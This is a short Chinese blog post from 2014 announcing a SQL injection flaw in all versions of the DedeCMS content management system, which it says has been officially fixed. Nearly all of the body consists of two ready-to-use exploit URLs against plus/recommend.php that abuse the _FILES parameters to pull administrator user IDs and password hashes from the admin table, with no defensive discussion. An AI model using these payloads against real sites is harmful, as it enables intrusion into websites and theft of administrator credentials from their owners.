DedeCMS全版本通杀SQL注入(官方已修复)

作者: 成都怪蜀黍 分类: 网络安全 发布时间: 2014-03-01 12:30
Exp:
plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\’ or mid=@`\’` 1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`#@__admin` limit+0,1),5,6,7,8,9#@`\’`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111
 
 
 
另外一枚/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\’and+char(@`’`)+++1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9 from `#@__admin`#

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!